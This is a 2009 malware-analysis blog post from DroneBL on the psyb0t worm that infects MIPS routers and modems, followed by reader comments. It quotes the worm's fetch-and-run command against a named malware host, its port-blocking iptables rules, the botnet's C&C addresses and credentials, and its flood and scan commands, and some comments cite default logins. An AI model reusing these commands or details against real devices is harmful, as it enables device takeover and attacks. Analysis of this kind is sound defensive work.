Network Bluepill - stealth router-based botnet has been DDoSing dronebl for the last couple of weeks

Below is a description of a botnet we found in the wild. However,

Update 4 -- Before you read anything else, read this

Am I Vulnerable?

You are only vulnerable if:

  • Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device.
  • Your device also has telnet, SSH or web-based interfaces available to the WAN, and
  • Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.

As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots.

Any device that meets the above criteria is vulnerable, including those built on custom firmware such as OpenWRT and DD-WRT. If the above criteria is not met, then the device is NOT vulnerable.

How can I tell if I have been infected?

Ports 22, 23 and 80 are blocked as part of the infection process (but NOT as part of the rootkit itself, running the rootkit itself will not alter your iptables configuration).

If these ports are blocked, you should perform a hard reset on your device, change the administrative passwords, and update to the latest firmware. These steps will remove the rootkit and ensure that your device is not reinfected.

Public Relations and Us

We deal with botnets and abusive hosts, not PR.

We are quite concerned that not many people have (there have been a few, but the majority of the people have used the 'slashdot version') contacted us, or anybody else working on this for further information or to verify if their conclusions written in their articles were correct. Many articles described this as a "end of the world, all routers are vulnerable" thing. This is simply not the case. We would prefer if you contact us if you do not understand fully now.

Commentary found on the Internet about "this rootkit is fake", or "it doesn't run on my ubuntu box", or "UPX doesn't unpack it"

Ok, first off, this binary is for MIPS-based processors, which are not X86 (the kind used in the average PC).

Secondly, this binary IS packed with UPX, but he has stripped the headers necessary to decompress it. A little time with a hex editor can get you the decompressed binary, as can just running it in qemu.

Commentary on "why isnt Law Enforcement involved"

Many botnet investigations are handled by the private sector. This is one of those investigations. If a Law Enforcement agency is interested in our work, or the work of anybody else researching this worm, then they should be encouraged to email admins@dronebl.org about it. If we have any useful information they don't already know, we will be more than happy to provide it.

Commentary on "is device X vulnerable?"

Short answer: We don't know. There are so many devices out there that we could not possibly know.

Your best bet would be to take action to upgrade the device firmware and secure any passwords if there is concern that the device may be vulnerable. Such actions will help to avoid exploitation by the worm.

The worm info itself

We have come across a botnet worm spreading around called "psyb0t". It is notable because, according to my knowledge, it:

  • is the first botnet worm to target routers and DSL modems
  • contains shellcode for many mipsel devices
  • is not targeting PCs or servers
  • uses multiple strategies for exploitation, including bruteforce username and password combinations
  • harvests usernames and passwords through deep packet inspection
  • can scan for exploitable phpMyAdmin and MySQL servers

Vulnerable devices

  • any linux mipsel routing device that has the router administration interface or sshd or telnetd in a DMZ, which has weak username/passwords (including openwrt/dd-wrt devices).
  • possibly others

Infection strategy

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.

IRC Botnet

Command and control server: strcpy.us.to
IP: 207.155.1.5 (master controller, Windstream Communications AS16687)
IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: [NIP]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it)

strcpy.us.to control domain nameservers: ns1.afraid.org, ns2.afraid.org, ns3.afraid.org, ns4.afraid.org [suspended]

IRC Commands

.mode <channel> <modes> - sets a mode on a channel
.login <password> - login to the bot
.logout - logout
.exit - causes the botnet to exit and remove itself
.sh <command> - runs <command> on shell
.tlist - lists all threads
.kill - kills a thread
.killall <pattern> - kills threads by glob-match pattern
.silent - makes the bot stop sending to channel
.getip - show bot WAN ip address
.visit <url> - flood URL with GET requests
.scan - scans a random range for vulnerable routers/modems
.rscan <range> - scans a CIDR range for vulnerable routers/modems
.lscan - scans the local subnet for vulnerable routers/modems
.lrscan - scans a range in the local subnet for vulnerable routers/modems
.split <threadid> - splits the workload of a scan thread into two threads
.sql <range> <url> - scans for vulnerable MySQL servers and attempts to make them download and run URL
.pma <range> <url> - scans for vulnerable phpMyAdmin and attempts to make them download and run URL
.sleep <secs> - makes the bot sleep for the given time
.sel - ???
.esel - skip next part if locale is not X
.vsel - skip next part if version is not X
.gsel - ???
.rejoin [delay] - cycle the channel after delay
.upgrade - download new bot from the distribution site
.ver - returns "[PRIVATE] PSYB0T" followed by version
.rs - returns detected rapidshare URLs and logins
.rsgen - generate a bogus rapidshare login page and force user to browse to it
.rsloop <port> - runs a webserver i/o loop on <port> as a thread
.wget <url> - runs wget with the provided url
.r00t - attempts to raise effective UID using vmsplice() exploit (seems pointless)
.sflood <ip> <count> - sends SYN packets to IP
.uflood <ip> <count> - sends UDP packets to IP
.iflood <ip> <count> - sends ICMP pings to IP
.pscan <ip> - portscans IP
.fscan <ip> - tries to bruteforce FTP server at IP

Commentary

As stated above, this is the first known botnet based on exploiting consumer network devices, such as home routers and cable/dsl modems. Many devices appear to be vulnerable. The size of this botnet so far cannot be determined.

The author of this worm has some sophisticated programming knowledge, given the nature of this executable.

Action must be taken immediately to stop this worm before it grows much larger.

We came across this botnet as part of an investigation into the DDoS attacks against DroneBL's infrastructure two weeks ago, and feel that this botnet was the one which flooded DroneBL.

We are looking into finding out more information about this botnet, and its controller. If you have any information, we would like to know.

If you intend to disassemble this botnet, you should note it's UPX-compressed.

I estimate that at the time of writing, there is at least 100,000 hosts infected.

I suspect that the .sql and .pma exploit tools are used for finding more controllers. But I do not have the controller payload.

This technique is one to be extremely concerned about because most end users will not know their network has been hacked, or that their router is exploited. This means that in the future, this could be an attack vector for the theft of personally identifying information. This technique will certainly not be going away.

Update

Some prior research about an earlier version has been found here. This research was done by Terry Baume.

Update 2

This botnet has apparently been shutdown:

* Now talking on #mipsel
* Topic for #mipsel is: .silent on .killall .exit ._exit_ .Research is over:
for those interested i reached 80K. That was fun :), time to get back to the real life... (To the DroneBL guys:
I never DDOSed/Phished anybody or peeked on anybody's private data for that matter)
* Topic for #mipsel set by DRS at Sun Mar 22 17:02:15 2009

While this information may or may not be true, we have received HTTP-based floods from IPs participating in this botnet.

We are still interested in this DRS person. If you have any information, please provide it to DroneBL. We will not disclose our sources.

We also hope that the router and modem manufacturers which have been monitoring this incident take note of it and secure their firmware from future attacks.

Update 3 (Disinfection Instructions)

We have been getting asked a lot about disinfection instructions.

To disinfect, simply powercycle your device and take appropriate action to lock it down, including the latest firmware updates, and using a secure password.



nenolod / Mar-22-2009 07:32:31 GMT

Comments for Network Bluepill - stealth router-based botnet has been DDoSing dronebl for the last couple of weeks

These are the 66 (2 hidden) comments for the above post. You may add your own comment below!

CryptWizard said on Mar-22-2009 07:45:19 GMT :

You never know when browsing a forum could somehow lead you to something like this: http://forums.whirlpool.net.au/forum-replies.cfm?t=1164229&p=2

BTW, nenolod, post your 2006 paper on the feasability of this! =P

William Pitcock said on Mar-22-2009 07:52:00 GMT :

I will need to find it, but will do so as soon as I find it in the mess that is my $HOME. :)

William Pitcock said on Mar-22-2009 10:25:20 GMT :

That paper is here, but it has been updated with some of the information above.

Lemming said on Mar-22-2009 11:25:34 GMT :

UPX-Packed? If try to unpack it:

upx: udhcpc.env: NotPackedException: not packed by UPX

Lemming said on Mar-22-2009 11:44:55 GMT :

Found an older research: http://www.adam.com.au/bogaurd/

phrozen77 said on Mar-22-2009 12:50:38 GMT :

"upx: udhcpc.env: NotPackedException: not packed by UPX"

The UPX header probably has been removed/changed to avoid automated spotting/unpacking of AV scanners.

Also, it is sort of trivial to change the way UPX packs stuff to add even more stealth to it, so your luck with unpacking it may vary - especially in upcoming generations of this.

Paul said on Mar-22-2009 15:31:12 GMT :

So the real question is how can someone know if their router/modem is infected? Is there an easy test that can be perfomed? What about a way to clean it?

I assume flashing a router will clean it but what about most DSL modems? They tend to be much harder to do and will probably just be replaced by most ISP's.

Lemming said on Mar-22-2009 16:21:56 GMT :

"It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports."

Test this ports if you have enabled it.

William Pitcock said on Mar-22-2009 21:04:11 GMT :

@Lemming: The current version (v18) seems to be packed in a different way. We suspect a modified version of UPX.

pjotr said on Mar-23-2009 18:47:03 GMT :

How can one protect one's router? Do you have any configuration suggestions?

Repton said on Mar-24-2009 00:31:05 GMT :

Don't let your router accept logins (web/ssh/etc.) from anywhere outside your home network.

WildFlame said on Mar-24-2009 00:53:32 GMT :

Easy way to take over control on remote router based on some versions of linux is login using default login/pass via ssh (port 22): login: admin password: admin I have seen lots of routers with unchanged password.

Shadyman said on Mar-24-2009 00:59:00 GMT :

@WildFlame:

Many routers, regardless of their OS, use the default password.

Rumpelstiltskin. said on Mar-24-2009 01:38:09 GMT :

And the moral is: don't us passwords that are in wordlists.

Iceman_B said on Mar-24-2009 01:46:51 GMT :

What about disabling password based logins(at least remote) and only allowking key-based connections? Shouldn's that help?

Überslack said on Mar-24-2009 02:05:17 GMT :

Are there any methods to detect if your router has been compromised (besides not being able to remotely login)?

William Pitcock said on Mar-24-2009 02:14:23 GMT :

@Überslack: Many routers will be locked out on LAN too with those iptables rules.

At any rate powercycling it will remove this worm.

Bob Bonomo said on Mar-24-2009 02:16:01 GMT :

Guess it was just a matter of time before this happened. Sorta knew it could be done.

public/private keys with your SSHD would sure make it harder if not impossible.

Ard Righ said on Mar-24-2009 02:21:07 GMT :

Note to self: Change user name and password on home router, and brother's home router also.

Iceman_B said on Mar-24-2009 02:48:55 GMT :

AFAIK and FWIW(acronyms ftw!): I don't think you can change the user for shell access in DD-WRT. It's always "root". The login for the WebUI CAN be changed and it would be wise to do so.

dan said on Mar-24-2009 04:13:46 GMT :

Surely it shouldn't be too much effort for manufacturers to ship these things with better passwords than "password". They should add a step to the post production process that assigns a unique password and prints this on the label on the bottom of the unit.

dan said on Mar-24-2009 04:21:30 GMT :

Just noticed the author of this thing is only one letter short of my initials! Grrr

Michael said on Mar-24-2009 06:17:46 GMT :

"is the first botnet worm to target routers and DSL modems"

Which DSL modems? Are SpeedTouch ADSL modems affected by this?

Toni said on Mar-24-2009 07:42:06 GMT :

The latest available in that URL is packed with UPX but as someone above suspected they've removed the headers. I didn't have a MIPS device at hand to work it in runtime so I resorted to manually fixing the headers so that the UPX tools bites:

http://www.teamfurry.com/wordpress/2009/03/23/botnet-running-on-mips-cpu-devices/

the version I downloaded was 2.9L so it has seen steady development in the past few months. Also, the new version connects to other servers and channels but I haven't been able to verify yet whether they are active.

Tamas Feher from Hungary said on Mar-24-2009 09:34:59 GMT :

Sounds like bullshit. If it was actually DDoS-ing DrobeBL, why didn't you go straight to the FBI and ICANN and ask to shut down the "dweb.webhop.net" address which spreads the home-router worm? Why is the wormsite still alive this very minute?

The Conficker Cabal led by Microsoft has been shutting down and disappropriating literally THOUSANDS of rogue domain name every single day totally reliably, with little effort and without any delay.

You could do that if you wanted to! This shows you have no meat to offer for the law enforcement, it's just a PR bubble!

William Pitcock said on Mar-24-2009 10:00:04 GMT :

@Tamas Feher from Hungary: Your comment indicates your complete obliviousness to law enforcement and their caring about internet activities. Heres a tip: they dont care unless there is some compelling reason for them to do so. Usually this reason has to do with money. If they cared, there would be no reason at all for DroneBL to exist.

William Pitcock said on Mar-24-2009 10:45:39 GMT :

@Tamas Feher from Hungary: Further, the dweb.webhop.net address is still active because there is no point in shutting it down. The botnet itself is still active, and it is a matter of finding the current C&C. By shutting down that URL, we simply lose the ability to find out where the new C&C is.

Chris Snyder said on Mar-24-2009 12:20:04 GMT :

Great work, guys. The Linux router space is such low-hanging fruit for bad guys, I'm surprised they still even bother with all of those virus-addled Windows hosts... except as attack vectors into the local network infrastructure.

Once in the router you are essentially in ultimate stealth mode as far as the vast majority of users are concerned. Who would even think to look there?

Pjotr said on Mar-24-2009 13:34:36 GMT :

I have disabled wireless access to the configuration screen (setup screen) of my router. So the router configuration (setup) is only reachable through a wired connection.

The router runs on the latest firmware from Linksys. Being a Linksys WRT54GL, I can only change the password. Unfortunately it is not possible to change the user name. I have customized the password, which is not from a dictionary.

Is this enough protection?

nbd said on Mar-24-2009 14:14:38 GMT :

OpenWrt blocks any open port from the WAN side by default, so in the default configuration, it's safe. Also: not all devices running OpenWrt are mips

Newsman said on Mar-24-2009 14:18:29 GMT :

To Iceman_B -- yes, you can change the username and password on DD-WRT. I'm not exactly a guru on these things, but I've done about three now and that is one of the things you can change. I just wish I could put the firmware on my wired-only router.

Crichton said on Mar-24-2009 15:05:19 GMT :

Actually, you CAN change the Username on a Netgear router. To do so, do the following:

After you have changed your password to something complex, and made a note of this password someplace safe, then select Backup Settings from the routers web-interface menu, and save this .cfg to your PC. Now edit that .cfg file - which is nothing more than a text file and change the string for "Username=admin" to something a bit more diverse. Save the file, and "restore" the settings to the router from the web-interface.

Adding entropy to prevent Wicked-People router-attacks? Done.

Crichton said on Mar-24-2009 15:12:34 GMT :

Actually, we are quite lucky...

This issue has been around for a while, and those in the Cognicenti have been moaning about it for years.

This w0rm could have been so much more worse.

C.

Vitality said on Mar-24-2009 15:33:37 GMT :

Well, it is not fault of the end-user. It is fault of the vendor and firmware developers. As a Linux/Unix specialist, I can confirm - opened any ssh,ftp,telnet and perhaps www is huge fruit for bed guys, especially when not strong passwd...

Do not open ports for remote shell and in any case use strong passwords and you will be well :)

Eric the Red said on Mar-24-2009 19:21:57 GMT :

"We are quite concerned that nobody has contacted us, or anybody else working on this for further information or to verify if their conclusions written in their articles were correct."

Funny guys, know all about routers and still appear to be completely oblivious to the internet.

I've worked with computers for a bit but "mipsel" as in "Your device is a mipsel device" meant nothing to me at first, although I guessed that MIPS was involved somehow.

Good article.

Also, I would find vendors who make telnet, SSH or web-based interfaces available to the WAN by default culpable too. I've seen a few.

Red_Wolf_2 said on Mar-24-2009 22:48:43 GMT :

Fascinating breakdown on what this nasty little worm does (yes, im the one who started the whirlpool thread about bulletin boards).

This sure does feel like a sign of whats to come, especially if whoever coded it did it as a PoC for others with nastier intentions... In any case, now the idea is out there and well publicised I am sure those with "commercial interests" will start working on their own versions, or a script kiddie could just change the irc server the bot heads to...

Did anyone figure out why some infected hosts were doing a ps -aux when they thought they had connected to a new host?

MIke S said on Mar-25-2009 07:17:20 GMT :

I'm always surprised to find out how many people I talk with who leave their router login unchanged from the default. Aughh!

simbr said on Mar-25-2009 08:42:40 GMT :

@Crichton You can also change the Netgear username (at least on the model I'm familiar with) using this CLI command:

nvram set http_username=newusername

(possible followed by nvram commit)

Phil said on Mar-25-2009 12:30:13 GMT :

Ports 22, 23 and 80 are blocked as part of the infection process

For the hard-of-thinking like me you might like to edit that to be more explicit about "ports blocked from LAN = symptom of infection" but "ports blocked from WAN = safe from infection".

We came across this botnet as part of an investigation into the DDoS attacks against DroneBL's infrastructure

You might like to be more explicit about exactly how you found it. Some people will be sceptical because the bot was so conveniently shut down just as you announced it, making the story harder to verify. I feel it would add credibility to expand on some of the details.

William Pitcock said on Mar-25-2009 12:52:44 GMT :

@Phil: We received a tip about the botnets existence and compared known IPs participating in this botnet with those we had found in our logs. I would figure the statement I made earlier makes that clear.

Draft_ said on Mar-25-2009 16:17:26 GMT :

I think maybe it's a good idea to list here all known mipsel devices?

Narles said on Mar-25-2009 16:41:22 GMT :

So far I haven't found a list of mfr names and model numbers! How can I tell if my Netgear wpn824 is affected?

AlexandreG said on Mar-25-2009 17:00:07 GMT :

Well... If I understand this correctly, in order to be infected, the router need to be manageable from the wan site.

I saw somewhere that linksys routers could be infected... It may be true! But in order to be infected (again if I am right...) you need to enable remote management. And I never saw a linksys home router with remote management enabled by default.

Same for all other brands I tried...

And even If you enable remote management, you need to have a weak password to be infected.

I never had a home router that had remote management turned on by default...

So, for wired router like the linksys or dlink ones, even if you haven't changed the password, you can't be infected because the remote administration is disabled.

Dan said on Mar-25-2009 17:54:23 GMT :

the problem is that many home and business users depend on ISP-provided routers that they have no control over other than a user-level password and access.

This large number of vulnerabilities are simply left up to the ISP to clear/reset/fortify, when they get the time to do it...

@Narles: Don't try to tell. Your best bet is to simply follow nenolod's instructions and reset your router. That will knock it out if you are, and again follow his instructions and SECURE your router by changing the password and as AlexandreG mentions, by turning OFF remote administration.

mike b said on Mar-25-2009 18:47:33 GMT :

" How can I tell if I have been infected? Ports 22, 23 and 80 are blocked as part "

Would this imply that an infected router cannot be logged into by it's owner anymore? Does the botnet change the password.

mikec said on Mar-25-2009 19:30:54 GMT :

So what would be a good metric in general, for determining whether a device were attackable? I.e. if one wanted to make a tool that could say "your device is vulnerable" by running a quickie test on it...

Maybe there's not a way to do this without being malicious one's self... buzzkill...

William Pitcock said on Mar-25-2009 21:37:31 GMT :

@AlexandreG: Nobody didnt say this router didnt mostly target idiots. However, there are quite a few routers out there which have remote administration on by default. I have been informed that the routers that charter provides all behave in this way.

@mike b: No, it does not change the device password.

@mikec: The metric I posted in the are you vulnerable? part.

Draft_ said on Mar-25-2009 22:27:54 GMT :

Fundamental thing is to find out hardware running in little endian mode.

Let's start the listing

WRT54GL - mips cpu little endian (mipsel)

AlexandreG said on Mar-26-2009 02:57:07 GMT :

@ William Pitcock: Wow... I really don't understand why they would turn on remote administration... No "normal" users are going to use it...

I use remote administration on some devices, but those are INSIDE a LAN... I would never make the admin available on the internet...

AlexandreG said on Mar-26-2009 03:00:26 GMT :

@Draft_ : No... this is not very important since the WRT54GL don't have the remote administration turned on by default... But it is a wireless router so there is other security issues... but anyway... In this case, by default, there is no risks...

Little endian or not, it is only a matter of time before the same kind of worm is compiled for other devices.

Christopher said on Mar-26-2009 03:01:48 GMT :

Guys, I made a spanish translation of most of this article on my blog. I know there might be many people feeling more comfortable reading spanish than english.

Anyone interested visit www.j0hnd0e.com.ar

To the authors: I sent an email. Excellent work this one of yours! :)

linux bridge said on Mar-26-2009 05:14:00 GMT :

another way to secure your modem/router is to run it in bridge mode. then you only need to worry about the security of the pc behind the bridge.

Daniel said on Mar-26-2009 10:28:42 GMT :

Thanks for the information about changing the username on a Netgear router. My router is a DG834G.

What restrictions are there on the length of a username? 31 characters? 63 Characters? Other?

Draft_ said on Mar-26-2009 16:47:24 GMT :

AlexandreG,

Did you read the beginning of the post?

"As such, 90% of the routers and modems participating in this botnet are participating due to user-error"

It is not relevant if remote administration is turned off by default - stupid users switch it ON.

LE is also important, since right NOW the only bot version out there is LE bot. Some day there might be also BigEndian, but until we don't see it it's not wise to consider this as risk since there only few MIPS processors capable on the fly switch to other endian. For worm most important is to find suitable environment to survive. Actually i dont know any linux running BE soho routers.

hhhobbit said on Mar-26-2009 19:49:15 GMT :

I don't see much value in changing the login name but if it makes you feel good go ahead. If it doesn't work all you have to do is recycle the puppy and you are back to the defaults. I also don't like a preset login password that is different from unit to unit. What if you lose the box / sheet with the password on it or get the unit from somebody else without that information? The only way that will work is if you burn it onto the box itself along with the serial number (and be prepared for returns if there are foul-ups). Otherwise, once you have lost that password you have effectively disabled the unit so it can never be used again. Instead, what router manufacturers should do is send their boxes out with config possible only on the WIRED LAN side as the default! Wired WAN and Wireless LAN configuration should be off by default. I even take a dim view of them even providing wired WAN config at all except for you tinker-toy people to have something to play with. There are some legitimate uses for it but it shouldn't be allowed without restricting access to which IP could come at you on the wired WAN side being a mandatory config setting when you turn it on. But just shifting to only wired LAN config alone would have prevented this POC! I don't know how you can get the users to tighten things down. Most of them view these routers as being like a lamp that you just plug in and use. The manufacturer should take steps to tighten anything down so that instead of the user doing the security enhancing they would be doing the opening of security holes. At least then they would be semi-consciously aware of what they are doing. Okay, SOME of them would be aware. I can't speak for the DNS servers in Hungary, but all of the hosts I saw in the article by Terry Baume have been shut down for French, UK, and US DNS servers. IOW, if the newer hosts being used are similarly nobbled the experimental bot is contained except for all of those packets pelting us. Is it really a rootkit? If so, why didn't it conceal the pnscans that were running? Further, why close down ports 22,23, and 80? It can't be just to mark the unit as infected. My bet is that it is done to prevent somebody else from capturing my bot (future use). A good rootkit would make it look like nothing has happened, conceal its presence and go about its business. At the least it should not block ports 22, 23, and 80 access on the wired LAN side and perhaps wireless LAN side if that was prevalent. IOW, I don't classify this as a rootkit (despite that "r00t" string). I do classify it as a worm infection that what I provide has no affect on preventing it at all (except for this advice). So have everybody hard reset their modems / routers, upgrade the firmware, change their passwords and enhance any other security settings they have and relax. The passwords can even be dictionary based as long as they are all different in blocking a dumb worm. What kills you is the WAN access and the same default password. I also fail to see how PII (Personally Identifiable Information) is going out the door on this thing. How is that happening? The last time I checked I don't store PII on my router. IOW, other than understanding all of those 22 and 23 probes on my WAN port I am good to go. You still haven't explained those 21s and others I am getting on my WAN port. So the excitement is all over. Oh yes, I do not have a mipsel but I can guarantee what I have is cinched down as tight as I can get it and that includes a non-default LAN IP subnet. I even totally block port 25 all ways now after that spammer that I basically shut down complained to my ISP that I was the one doing the spamming and the ISP stupidly believed them and shut down my port 25. They opened the 25 port back up but I am blocking it in all directions now and monitoring for ANYBODY that is attempting to use my 25 SMTP port. That is a warning because I report them to my ISP. So now I am back to work removing the parked and dead proxies from my lists ... the fun is over. PS I am a humanbot - half human, half machine (and have the hardware to prove it in my body). So how do I answer your question?

Ian Walker said on Mar-26-2009 21:52:21 GMT :

I have had problems with these hackers for years. They did this first to an NB9W netcomm router. I tried to get netcomm interested, including geting the government ombudsman involved, but it all went quiet. I then obtained an NB5, and yes I did lock it down, and yes it only took a short amount of time to compromise it. The hackers are either Chinese/Taiwanese/Korean or are others pretending to be. I suspect DSD. Before the psyb0t storm broke I noticed rogue ports opened to sites in Scottsdale in the US, hosted on secureserver sites. The first site was telling as it used psy...phr... as its name (some parts ommitted). The person had clickjacked a sign up session I had with a mobile phone used as an AP... I suggest my routers have been used as a prototype of the psyb0t hack (and others), and that someone out there has a rather vicious vendetta against me. I offer a $10000 reward for the arrest and successful prosecution of this person/s

Daniel said on Mar-27-2009 11:08:20 GMT :

hhhobbit said "What if you lose the box / sheet with the password on it or get the unit from somebody else without that information? The only way that will work is if you burn it onto the box itself along with the serial number (and be prepared for returns if there are foul-ups). Otherwise, once you have lost that password you have effectively disabled the unit so it can never be used again.".

Every router I have seen can be returned to factory defaults,so the unit is never comletely disabled.

Sec EX said on Mar-28-2009 10:12:17 GMT :

This site seams to be trying to hype \"nothing\" for attention. Besides, IF it\'s true then it is no more dangerous than not setting a good password; and anyways, most routers DO NOT allow remote administration by default.

David Leppik said on Mar-28-2009 17:40:41 GMT :

I suspect I was infected today. I don't have publicly accessible administrative access, so at first I thought I was safe. But my wireless network isn't secured, and occasionally neighbors use my network.

Factory-default settings are NOT safe-- LAN-only administration only restricts the attach vector, it doesn't eliminate it.

phil said on Mar-29-2009 04:49:41 GMT :

Don't use a dictionary word as your password and you are 100% safe, imo. If you haven't been using a strong password, flash your router, and start using one. Problem solved.

The lesson to be learned here is that end users need to be better informed about basic security AND vendors need to ensure that this happens.

fghf said on Mar-31-2009 18:49:30 GMT :

This doesn't seem to be effective anymore; Just a proof of concept.

Tom Dark said on Apr-09-2009 20:52:34 GMT :

Where can I get free router security?

zheko said on Apr-13-2009 15:03:34 GMT :

2Tom Dark i can tune it for yu

joan said on May-14-2009 10:26:30 GMT :

Type of bugs that can damage and ruin my computer. If you are like me and tired many different scans in the past looking for something that will protect and clean your computer, give Search-and-destroy Antispyware a try. I found that the antispyware solution from Search-and-destroy (http://www.Search-and-destroy.com) is an excellent choice. It’s less expensive than many of the other scans I’ve tired but it finds the same type of bugs that can damage and ruin my computer. I am so happy with this scanner that I want to tell everyone about it so you can give it a try to. I’m sure you will love it.

jeff said on May-21-2009 17:28:13 GMT :

In fact, spybot isn't bad but there's way better stuff to fight against spyware / malware.

it's a good thing you talk about it.. but it shouldn't be here in ... this software won't help at all in the subject we're interested here since it won't check your modem ou router.

ADSLGeek said on Dec-23-2009 07:44:14 GMT :

Hey there,

I am trying to build a router security scanner, and in particular was hoping to work out a way to detect remotely if you router is vulnerable:

This will ultimately be up here: http://www.adslgeek.com/galileo (This currently scans for Dlink vulnerability)

I would appreciate if someone could email me at aslan (thefunnylittleatsymbol) adslgeek (fullstop) com if you can think of an easy script to detect if a router might be vulnerable from Psyb0t?

I was thinking a simple NMAP scan of open ports might be a start?

I am hoping to build a database of the vulnerable modems here: http://www.adslgeek.com/dslforum/index.php?topic=252

So if anyone knows or hears of any other routers that are vulnerable, feel free to let me know.

Cheers, a DSL geek

P.S. Great work on finding this vulnerability!

Add your own comment

Your name
Your comment
You can use markdown syntax here for formatting.